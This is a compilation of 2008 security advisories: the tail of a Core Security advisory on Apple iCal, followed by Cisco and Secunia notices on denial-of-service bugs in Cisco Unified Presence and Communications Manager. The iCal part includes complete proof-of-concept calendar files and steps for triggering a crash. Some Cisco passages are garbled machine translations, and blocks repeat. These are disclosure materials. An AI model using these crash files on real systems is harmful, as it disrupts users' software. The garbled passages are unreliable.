RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:10 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T124414Z SUMMARY:Fake Event DTEND;TZID=America/Buenos_Aires:20071225T010000 RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 TRANSP:OPAQUE CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT65535H END:VALARM END:VEVENT END:VCALENDAR - -----------/ 3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007) This is another case of bad validation of a file with the iCalendar format that results in a more serious bug. A vulnerable .ics file will contain the following line: /----------- ATTACH;VALUE=URI:S=osumi - -----------/ The corresponding PoC follows. Double-click on the .ics file with the following content, an event will be created. To crash iCal click on the newly created event and the on the alarm sound list. /----------- BEGIN:VCALENDAR X-WR-TIMEZONE:America/Buenos_Aires PRODID:-//Apple Inc.//iCal 3.0//EN CALSCALE:GREGORIAN X-WR-CALNAME:evento falso VERSION:2.0 X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990 METHOD:PUBLISH BEGIN:VTIMEZONE TZID:America/Buenos_Aires BEGIN:DAYLIGHT TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:19991003T000000 RDATE:19991003T000000 TZNAME:ARST END:DAYLIGHT BEGIN:STANDARD TZOFFSETFROM:-0300 TZOFFSETTO:-0300 DTSTART:20000303T000000 RDATE:20000303T000000 RDATE:20001231T210000 TZNAME:ART END:STANDARD END:VTIMEZONE BEGIN:VEVENT SEQUENCE:11 DTSTART;TZID=America/Buenos_Aires:20071225T000000 DTSTAMP:20071213T143420Z SUMMARY:evento falso DTEND;TZID=America/Buenos_Aires:20071225T010000 LOCATION:donde se hace RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1 TRANSP:OPAQUE UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9 URL;VALUE=URI:http://pepe.com:443/pepe ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2 0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php CREATED:20071213T142720Z CREATED:20071213T124215Z BEGIN:VALARM X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49 ACTION:DISPLAY DESCRIPTION:Event reminder TRIGGER:-PT15H END:VALARM BEGIN:VALARM X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0 ACTION:AUDIO TRIGGER:-PT15M ATTACH;VALUE=URI:S=osumi END:VALARM END:VEVENT END:VCALENDAR - -----------/ *Report Timeline* . 2008-01-30: Core sends an initial notification that vulnerabilities were discovered in the iCal application and iCal server and that an advisory draft is available. 2008-01-31: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft, including proof-of-concept files that trigger the bugs. 2008-02-12: Core requests update info on the vulnerabilities and states that wants to coordinate the date of the disclosure. 2008-02-18: Core requests update info on the vulnerabilities. 2008-02-18: Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is tracked for a fix in an upcoming update and the vulnerabilities in the iCal client application will be fixed in an update following the early March software update. 2008-02-19: Core indicated that it will split the report in two security advisories. CORE-2008-0123 will address the vulnerability in iCal server (CVE-2008-1000) and will be published in coordination with the release of the vendor's March software update. The publication date for the second advisory, will dealt bydealing with the three vulnerabilities in the iCal client application will be coordinated for a date after the March update unless there are clear indications of the vulnerability being exploited in the wild, in which case if Core considers that the information provided in the advisory would help end users to decide how to react the advisory would be published sooner as a "forced release". 2008-03-03: Core requests update info on the vulnerability, a concrete release schedule and text for the advisory section called "Vendor Information, Solutions and Workarounds". 2008-03-04: Vendor provides information concerning CVE-2008-1000 and indicates that the bug is in the Wiki server and not the iCal Server. 2008-03-13: Core re-schedules the publication to March 24th and requests the vendor an update on the coordinated date of disclosure. The remaining three vulnerabilities in the iCal client application will be dealt by a second security advisory (CORE-2008-0126) to be published after the release of the March software update. Publication of CORE-2008-0126 is initially slated for March 24th 2008 but the final date estimation can be discussed further with the vendor based on its estimated date for fixes. 2008-03-18: APPLE-SA-2008-0318 software update released. 2008-03-18: CORE-2008-0123 is published. 2008-03-18: Vendor informs that will track the first two issues as crasher-only bugs but still intends to address them. Further details to determine if the null pointer de-reference bugs are exploitable are requested. The vendor will continue to track the third as a security bug and estimates early April for the release of the software update that fix them. Additional timing information will be provided closer to the estimated date. 2008-03-18: Core re-schedules the publication to April 7th and indicates that should any new details about the vulnerabilities become available they will be forwarded to the vendor. 2008-04-04: Core requests a more precise date of release of the fixes to coordinate the publication and recommends the vendor to consider the three as security bugs because it couldn't be proved that in this case the integer overflows can't be exploited. 2008-04-07: Vendor requests that Core to postpone the advisory publication until the fix is available. 2008-04-07: Core requests a more precise date of release of the fixes to coordinate the new publication date. 2008-04-07: Vendor informs that the estimated date for the update is near the end of April. 2008-04-08: Core confirms that coordinating the publication of CORE-2008-0126 for April 28th is acceptable. 2008-04-16: Core requests an update on the release date of the fixes. 2008-04-17: Vendor states that end of April is still the estimated date and provides more details that explain why the first two bugs are been considered null-pointer dereference bugs only. A value range verification is performed and out-of-range values branch execution flow to instructions that assign NULL to a pointer which later triggers a null pointer de-reference that causes the application to crash. the root cause of the crash is a NULL pointer de-reference and not an integer overflow. 2008-04-17: Core confirms that the two first bugs can be considered crashes due to null-pointer dereference. Upon further research it is confirmed that integer overflows are detected and do not cause the actual crashes. 2008-04-17: Vendor asks confirmation that the first two bugs have no security related consequences. 2008-04-17: Core responds that the three bugs still have security related consequences. The first two bugs can be abuse to execute denial of service attacks by untrusted and unauthenticated third parties specifically using public server as attack vector. Core considers bug that allow unauthenticated third parties to be security vulnerabilities. Core indicates that exploitation of null pointer de-reference bugs cannot be ruled out generically, a statement which could be derived from Rice's theorem. 2008-04-25: Core requests an update on the release date of the fixes and sends detailed information on the analysis of the first bug. 2008-04-27: Vendor estimates early May as the date of the software fixes release. 2008-05-05: Core informs the vendor that it's re-scheduling the publication to May 12th as a final date unless precise information is given on the release date of the fixes. 2008-05-06: Vendor responds precising that the fixes are being released sometime the following week. 2008-05-07: Core states that it is not willing to re-schedule publication date unless the vendor commits to a concrete date. 2008-05-10: Vendor asks Core not to publish the advisory before Apple security update is available. Vendor indicates that fixes will be released on May 19th, 2008. 2008-05-10: Given that the vendor has communicated a concrete date, Core will discuss re-scheduling (for the fifth time) the publication date of the advisory. 2008-05-12: Core communicates the vendor that the publication of the advisory is re-scheduled to May 21th, that date is final. 2008-05-14: Vendor acknowledges reception of the last email and appreciates that Core posponed the advisory publication date. 2008-05-20: Core send the final draft of the advisory to the vendor. 2008-05-21: An edited and corrected final version of the advisory is sent to the vendor. 2008-05-21: Advisory CORE-2008-0126 is published. *References* [1] RFC 2445: Internet Calendaring and Scheduling Core Object Specification (iCalendar) - http://tools.ietf.org/html/rfc2445 [2] RFC 4791: Calendaring Extensions to WebDAV - http://tools.ietf.org/html/rfc4791 [3] http://www.apple.com/downloads/macosx/calendars/ [4] iCalShare http://icalshare.com/ [5] iCalWorld http://www.icalworld.com/ *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8 PZO21gkXaFO1pAdxuViw2ys= =xZCy -----END PGP SIGNATURE-----

The Presence Engine (PE) service in Cisco Unified Presence before 6.0(1) allows remote attackers to cause a denial of service (core dump and service interruption) via malformed packets, aka Bug ID CSCsh50164. Denial of service due to packets intentionally created by a remote attacker (DoS) There is a possibility of being put into a state. The problem is Bug ID : CSCsh50164 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. An attacker can exploit this issue to crash the affected device, denying service to legitimate users. The CISCO AKA number is CSCsh50164. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. The vulnerabilities affect version 1.0. SOLUTION: Upgrade to version 6.0(3). http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2 PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Presence Engine (PE) service in Cisco Unified Presence before 6.0(1) allows remote attackers to cause a denial of service (core dump and service interruption) via an unspecified "stress test," aka Bug ID CSCsh20972. Details unknown to remote attacker 'stress test,' Through service disruption (DoS) There is a possibility of being put into a state. The problem is Bug ID : CSCsh20972 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. An attacker can exploit this issue to cause the affected application to crash, denying service to legitimate users. These vulnerabilities were discovered internally by Cisco, and there are no workarounds. Cisco has released free software updates that address these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml. The software version can be determined by running the command show version active via the Command Line Interface (CLI). Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Unified Presence collects information about a user's availability status and communications capabilities. Using information captured by Cisco Unified Presence, applications such as Cisco Unified Personal Communicator and Cisco Unified Communications Manager can improve productivity by helping users connect with colleagues more efficiently by determining the most effective means for collaborative communication. There are no workarounds for these vulnerabilities. There is no workaround for this vulnerability. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsh50164 - PE Service core dumps when it receives malformed packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsh20972 - PE Service core dumps under stress test CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsj64533 - SIPD service core dumps during TCP port scan CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of any of the vulnerabilities may result in the interruption of presence services. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Fixes for all the vulnerabilities listed in this advisory are included in Cisco Unified Presence version 6.0(3) that is available at the following link: http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2 Workarounds =========== There are no workarounds for these vulnerabilities. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. These vulnerabilities were internally discovered by Cisco. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-14 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- iD8DBQFIKw1+86n/Gc8U/uARAlunAJ9UTjai8ZofKwUcH7B3CqyBetjIDwCdHgUI 91czchLkcIoB9pmUP9zWEI0= =gkID -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. SOLUTION: Upgrade to version 6.0(3). http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2 PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor

The SIP Proxy (SIPD) service in Cisco Unified Presence before 6.0(3) allows remote attackers to cause a denial of service (core dump and service interruption) via a TCP port scan, aka Bug ID CSCsj64533. The problem is Bug ID : CSCsj64533 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. An attacker can exploit this issue to cause denial-of-service conditions for legitimate users. These vulnerabilities were discovered internally by Cisco, and there are no workarounds. Cisco has released free software updates that address these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml. Administrators of systems running all Cisco Unified Presence versions can determine the software version by viewing the main page of the Cisco Unified Presence Administration interface. The software version can be determined by running the command show version active via the Command Line Interface (CLI). Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Unified Presence collects information about a user's availability status and communications capabilities. Using information captured by Cisco Unified Presence, applications such as Cisco Unified Personal Communicator and Cisco Unified Communications Manager can improve productivity by helping users connect with colleagues more efficiently by determining the most effective means for collaborative communication. There are no workarounds for these vulnerabilities. Cisco Unified Presence version 6.0(1) is the upgrade path for Cisco Unified Presence version 1.0. There is no workaround for this vulnerability. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsh50164 - PE Service core dumps when it receives malformed packets CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsh20972 - PE Service core dumps under stress test CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsj64533 - SIPD service core dumps during TCP port scan CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of any of the vulnerabilities may result in the interruption of presence services. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Fixes for all the vulnerabilities listed in this advisory are included in Cisco Unified Presence version 6.0(3) that is available at the following link: http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2 Workarounds =========== There are no workarounds for these vulnerabilities. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. These vulnerabilities were internally discovered by Cisco. Status of this Notice: FINAL THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-14 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- iD8DBQFIKw1+86n/Gc8U/uARAlunAJ9UTjai8ZofKwUcH7B3CqyBetjIDwCdHgUI 91czchLkcIoB9pmUP9zWEI0= =gkID -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. performing a TCP port scan on an affected system. SOLUTION: Update to version 6.0(3). http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2 PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor

Memory leak in the Certificate Trust List (CTL) Provider service in Cisco Unified Communications Manager (CUCM) 5.x before 5.1(3) allows remote attackers to cause a denial of service (memory consumption and service interruption) via a series of malformed TCP packets, as demonstrated by TCPFUZZ, aka Bug ID CSCsj80609. TCPFUZZ A series of deliberately created, as demonstrated by TCP Service disruption via packets (DoS) There is a possibility of being put into a state. The problem is Bug ID : CSCsj80609 It is a problem.Please refer to the “Overview” for the impact of this vulnerability. These issues affect the following components: Certificate Trust List (CTL) Provider Certificate Authority Proxy Function (CAPF) Session Initiation Protocol (SIP) Simple Network Management Protocol (SNMP) Trap An attacker can exploit these issues to cause denial-of-service conditions in the affected application. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. This vulnerability is reported in version 5.x. 2) Another error within the CTL Provider service can be exploited to consume large amounts of memory resources via a series of specially crafted packets sent to default port 2444/TCP. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, and 4.3. This vulnerability is reported in versions 5.x and 6.x. This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and 6.x. SOLUTION: Update to the fixed versions. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. These vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version can also be determined by running the command show version active via the command line interface (CLI). No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. The CTL Provider service listens by default on TCP port 2444 and is user configurable. The CTL Provider service is enabled by default. There is a workaround for this vulnerability. The CTL Provider service listens by default on TCP port 2444 and is user configurable. There is a workaround for this vulnerability. The CAPF service listens by default on TCP port 3804 and is user configurable. The CAPF service is disabled by default. There is a workaround for this vulnerability. SIP-Related Vulnerabilities Cisco Unified Communications Manager versions 5.x and 6.x contain a vulnerability in the handling of malformed SIP JOIN messages that may result in a DoS condition. There is no workaround for this vulnerability. There is no workaround for this vulnerability. There is no workaround for this vulnerability. The SNMP Trap Agent service listens by default on UDP port 61441. There is a workaround for this vulnerability. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsi98433 - CTLProvider leaks memory in certain scenarios CVSS Base Score - 7.8 Access Vector - Network 